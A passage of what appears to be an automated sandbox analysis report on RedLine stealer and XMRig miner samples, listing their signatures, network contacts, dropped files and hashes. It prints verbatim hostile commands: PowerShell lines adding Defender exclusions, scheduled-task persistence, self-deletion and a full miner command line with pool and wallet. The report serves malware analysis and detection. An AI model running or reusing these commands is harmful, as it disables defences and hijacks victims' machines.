| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
Files
memory/1212-60-0x00000000762C1000-0x00000000762C3000-memory.dmp
memory/1212-62-0x0000000000B80000-0x0000000000B81000-memory.dmp
memory/1212-64-0x0000000005710000-0x0000000005711000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210410
Max time kernel
18s
Max time network
120s
Command Line
Signatures
RedLine
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Crystal.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Crystal.exe
"C:\Users\Admin\AppData\Local\Temp\Crystal.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 93.184.220.29:80 | tcp | |
| N/A | 185.252.144.65:4545 | 185.252.144.65 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 52.182.141.63:443 | tcp |
Files
memory/3904-115-0x00000000773E0000-0x000000007756E000-memory.dmp
memory/3904-116-0x0000000000150000-0x0000000000151000-memory.dmp
memory/3904-118-0x00000000058A0000-0x00000000058A1000-memory.dmp
memory/3904-119-0x0000000005330000-0x0000000005331000-memory.dmp
memory/3904-120-0x0000000005390000-0x0000000005391000-memory.dmp
memory/3904-121-0x00000000053D0000-0x00000000053D1000-memory.dmp
memory/3904-122-0x0000000005290000-0x0000000005896000-memory.dmp
memory/3904-123-0x0000000005640000-0x0000000005641000-memory.dmp
memory/3904-124-0x00000000067B0000-0x00000000067B1000-memory.dmp
memory/3904-125-0x0000000006EB0000-0x0000000006EB1000-memory.dmp
memory/3904-126-0x00000000078E0000-0x00000000078E1000-memory.dmp
memory/3904-127-0x0000000006A80000-0x0000000006A81000-memory.dmp
memory/3904-128-0x0000000006CE0000-0x0000000006CE1000-memory.dmp
memory/3904-129-0x0000000006D80000-0x0000000006D81000-memory.dmp
memory/3904-130-0x0000000006E70000-0x0000000006E71000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:56
Platform
win7v20210410
Max time kernel
33s
Max time network
83s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 45.14.49.109:54819 | 45.14.49.109 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 172.67.75.172:443 | api.ip.sb | tcp |
Files
memory/368-60-0x0000000075A71000-0x0000000075A73000-memory.dmp
memory/368-61-0x0000000000260000-0x000000000028F000-memory.dmp
memory/368-62-0x0000000000400000-0x0000000002C86000-memory.dmp
memory/368-63-0x0000000003020000-0x000000000303C000-memory.dmp
memory/368-64-0x00000000033F0000-0x0000000005C76000-memory.dmp
memory/368-65-0x00000000033F0000-0x0000000005C76000-memory.dmp
memory/368-66-0x00000000033F0000-0x0000000005C76000-memory.dmp
memory/368-67-0x0000000003310000-0x000000000332A000-memory.dmp
memory/368-68-0x00000000033F0000-0x0000000005C76000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210410
Max time kernel
150s
Max time network
132s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Datafile32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Datafile64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\intobroker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Windows\system32\services32.exe | N/A |
| N/A | N/A | C:\Windows\system32\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| N/A | N/A | C:\Windows\system32\Microsoft\Libs\sihost64.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\Microsoft\Libs\WR64.sys | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.log | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Libs\sihost64.log | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File created | C:\Windows\system32\services32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File opened for modification | C:\Windows\system32\services32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File created | C:\Windows\system32\services64.exe | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File opened for modification | C:\Windows\system32\services64.exe | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Libs\sihost64.exe | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1424 set thread context of 2700 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost64.exe | C:\Windows\System32\cmd.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe
"C:\Users\Admin\AppData\Local\Temp\Software patch v2.0.5.exe"
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Users\Admin\AppData\Local\Temp\intobroker.exe
"C:\Users\Admin\AppData\Local\Temp\intobroker.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
C:\Windows\system32\services32.exe
"C:\Windows\system32\services32.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\services64.exe
"C:\Windows\system32\services64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
C:\Users\Admin\AppData\Local\Temp\svchost64.exe
C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\cmd.exe
C:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9CnVX+ALijX6xMxSjb1GpdkRKRzu9R9fDFnn2Jk5tiB521c56MeySJCVvaV5sI5rrRsTcEJRRsj0lVopee3kzDJD3W6xwTmhYz+Ng/th6kws=" --cinit-idle-wait=4 --cinit-idle-cpu=80 --cinit-stealth
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
Network
| Country | Destination | Domain | Proto |
| N/A | 82.146.43.167:80 | 82.146.43.167 | tcp |
| N/A | 8.8.8.8:53 | iplogger.org | udp |
| N/A | 88.99.66.31:443 | iplogger.org | tcp |
| N/A | 45.82.179.116:10425 | 45.82.179.116 | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.13.31:443 | api.ip.sb | tcp |
| N/A | 8.8.8.8:53 | sanctam.net | udp |
| N/A | 185.65.135.248:58899 | sanctam.net | tcp |
| N/A | 8.8.8.8:53 | bitbucket.org | udp |
| N/A | 104.192.141.1:443 | bitbucket.org | tcp |
| N/A | 185.65.135.248:58899 | sanctam.net | tcp |
| N/A | 104.192.141.1:443 | bitbucket.org | tcp |
| N/A | 8.8.8.8:53 | pool.hashvault.pro | udp |
| N/A | 49.12.130.173:80 | pool.hashvault.pro | tcp |
Files
memory/4092-115-0x0000000001230000-0x0000000001231000-memory.dmp
memory/4092-117-0x0000000076FB0000-0x000000007713E000-memory.dmp
memory/4092-118-0x0000000006310000-0x0000000006311000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
| MD5 | bec0eae49234663c36f6247f68c79f6a |
| SHA1 | 7ca78913a61335b793c7bf0da11583562191d5ca |
| SHA256 | 5027171f6a2fe8de197451587a040afa75dc236f55ff80f0548e4ef3c04341bd |
| SHA512 | c7275a3763286878026cb56b85eb6c800c1a800d31ee3f0a1b2e1964dbf3df45e57cd750690540f92cbacc3991a5d2b8b2c64c75db5de5623dfd191d55f09699 |
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
| MD5 | bec0eae49234663c36f6247f68c79f6a |
| SHA1 | 7ca78913a61335b793c7bf0da11583562191d5ca |
| SHA256 | 5027171f6a2fe8de197451587a040afa75dc236f55ff80f0548e4ef3c04341bd |
| SHA512 | c7275a3763286878026cb56b85eb6c800c1a800d31ee3f0a1b2e1964dbf3df45e57cd750690540f92cbacc3991a5d2b8b2c64c75db5de5623dfd191d55f09699 |
memory/3708-119-0x0000000000000000-mapping.dmp
memory/3708-122-0x0000000000320000-0x0000000000321000-memory.dmp
memory/2848-124-0x0000000000000000-mapping.dmp
memory/3400-125-0x0000000000000000-mapping.dmp
memory/2356-128-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
| MD5 | 8ec76da7bfe6c529ef72663bfd51f7ca |
| SHA1 | 1ea53c3b298c710026e84bfb49d1c444d467b8d4 |
| SHA256 | 7529fba2b0f52fc3764fb8c873cbef625d186cc1f7d41e98461d4cb4f118dddb |
| SHA512 | ec2221b69aad1dbb1515422fa54ff021bb2dfec96b35fbad06b1e95f8a4e6bebbdbf7901ba9fd2c4c5b09e79d498a71a1f9e07b53b44fad8b51309586719bc45 |
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
| MD5 | 8ec76da7bfe6c529ef72663bfd51f7ca |
| SHA1 | 1ea53c3b298c710026e84bfb49d1c444d467b8d4 |
| SHA256 | 7529fba2b0f52fc3764fb8c873cbef625d186cc1f7d41e98461d4cb4f118dddb |
| SHA512 | ec2221b69aad1dbb1515422fa54ff021bb2dfec96b35fbad06b1e95f8a4e6bebbdbf7901ba9fd2c4c5b09e79d498a71a1f9e07b53b44fad8b51309586719bc45 |
memory/3708-133-0x000000001BDE0000-0x000000001BDE2000-memory.dmp
memory/2356-132-0x0000000000020000-0x0000000000021000-memory.dmp
memory/1512-137-0x0000000000000000-mapping.dmp
memory/2108-139-0x0000000000000000-mapping.dmp
memory/3400-138-0x000002F2E5DA0000-0x000002F2E5DA1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\intobroker.exe
| MD5 | 3e25ef4718d35a859830b11fa4a15048 |
| SHA1 | e6f0aff8a877b1fa594d5f91e708b9e953f82929 |
| SHA256 | 1586190890a214d6f80313f68b0cd2bc17c496913bcc2ba332394dfd601c5179 |
| SHA512 | bb8c2c060db22f3f96bee631810a87b2ed34c637a7cb61d0da69658935199165b2c32cfc8451de792efb6aee538cf8dc61acb03421907fb865d5d0c2dcc27b63 |
memory/4092-141-0x0000000007720000-0x0000000007721000-memory.dmp
memory/3616-142-0x0000000000000000-mapping.dmp
memory/4092-143-0x0000000007310000-0x0000000007311000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\intobroker.exe
| MD5 | 3e25ef4718d35a859830b11fa4a15048 |
| SHA1 | e6f0aff8a877b1fa594d5f91e708b9e953f82929 |
| SHA256 | 1586190890a214d6f80313f68b0cd2bc17c496913bcc2ba332394dfd601c5179 |
| SHA512 | bb8c2c060db22f3f96bee631810a87b2ed34c637a7cb61d0da69658935199165b2c32cfc8451de792efb6aee538cf8dc61acb03421907fb865d5d0c2dcc27b63 |
memory/2108-147-0x0000000000910000-0x0000000000911000-memory.dmp
memory/2108-151-0x00000000056D0000-0x00000000056D1000-memory.dmp
memory/2108-153-0x0000000005120000-0x0000000005121000-memory.dmp
memory/2108-155-0x0000000005180000-0x0000000005181000-memory.dmp
memory/3400-160-0x000002F2E6050000-0x000002F2E6051000-memory.dmp
memory/2108-161-0x00000000051C0000-0x00000000051C1000-memory.dmp
memory/3400-162-0x000002F2CBBF0000-0x000002F2CBBF2000-memory.dmp
memory/3400-163-0x000002F2CBBF3000-0x000002F2CBBF5000-memory.dmp
memory/2356-164-0x000000001BC80000-0x000000001BC82000-memory.dmp
memory/3616-165-0x0000021DAD020000-0x0000021DAD022000-memory.dmp
memory/3616-166-0x0000021DAD023000-0x0000021DAD025000-memory.dmp
memory/2108-167-0x00000000050C0000-0x00000000056C6000-memory.dmp
memory/2108-173-0x0000000005430000-0x0000000005431000-memory.dmp
memory/3400-214-0x000002F2CBBF6000-0x000002F2CBBF8000-memory.dmp
memory/3616-215-0x0000021DAD026000-0x0000021DAD028000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 41373bf5c8eebe991e882105deba11f8 |
| SHA1 | 191ca2e3087ef457af82bac6e6402c97673c3457 |
| SHA256 | 0d10cd226b0c779d00915568ba95bd5f345d846355817c701e98f674cd4b0dcf |
| SHA512 | aa6613725ac751d8048c2ed8ae0151c681d92a7db2ced13a6ad2a4b60878c8e64852162731912279afc9cd4c1446da99e152ccab8a0fabce58da145598a84420 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
memory/3264-228-0x0000000000000000-mapping.dmp
memory/4032-229-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 41373bf5c8eebe991e882105deba11f8 |
| SHA1 | 191ca2e3087ef457af82bac6e6402c97673c3457 |
| SHA256 | 0d10cd226b0c779d00915568ba95bd5f345d846355817c701e98f674cd4b0dcf |
| SHA512 | aa6613725ac751d8048c2ed8ae0151c681d92a7db2ced13a6ad2a4b60878c8e64852162731912279afc9cd4c1446da99e152ccab8a0fabce58da145598a84420 |
memory/3616-260-0x0000021DAD028000-0x0000021DAD029000-memory.dmp
memory/3400-263-0x000002F2CBBF8000-0x000002F2CBBF9000-memory.dmp
memory/3264-266-0x000001AFF81A0000-0x000001AFF81A2000-memory.dmp
memory/4032-269-0x000002B570360000-0x000002B570362000-memory.dmp
memory/3264-272-0x000001AFF81A3000-0x000001AFF81A5000-memory.dmp
memory/3264-278-0x000001AFF81A6000-0x000001AFF81A8000-memory.dmp
memory/4032-275-0x000002B570363000-0x000002B570365000-memory.dmp
memory/4032-282-0x000002B570366000-0x000002B570368000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 883b5711519a869f7184c30386d82263 |
| SHA1 | a4d562b317c70c8f208d03494be4a89a302ab487 |
| SHA256 | 6d8811e0bf049cd1f1dd8b1ddf7a1a3d07045df12b0e6dce5225fe06dba4cae5 |
| SHA512 | dceddd8a09922ef3b8305df31e34028fc852789f8faf21676095353b35165e77608c901b8840274ade7fa2fa9c31e1f2e0cc8912bcc5312c48eb1d71bae67709 |
memory/656-310-0x0000000000000000-mapping.dmp
memory/2084-311-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 883b5711519a869f7184c30386d82263 |
| SHA1 | a4d562b317c70c8f208d03494be4a89a302ab487 |
| SHA256 | 6d8811e0bf049cd1f1dd8b1ddf7a1a3d07045df12b0e6dce5225fe06dba4cae5 |
| SHA512 | dceddd8a09922ef3b8305df31e34028fc852789f8faf21676095353b35165e77608c901b8840274ade7fa2fa9c31e1f2e0cc8912bcc5312c48eb1d71bae67709 |
memory/4032-326-0x000002B570368000-0x000002B570369000-memory.dmp
memory/656-327-0x000001E370450000-0x000001E370452000-memory.dmp
memory/3264-325-0x000001AFF81A8000-0x000001AFF81A9000-memory.dmp
memory/656-329-0x000001E370453000-0x000001E370455000-memory.dmp
memory/2084-331-0x000002BC668F0000-0x000002BC668F2000-memory.dmp
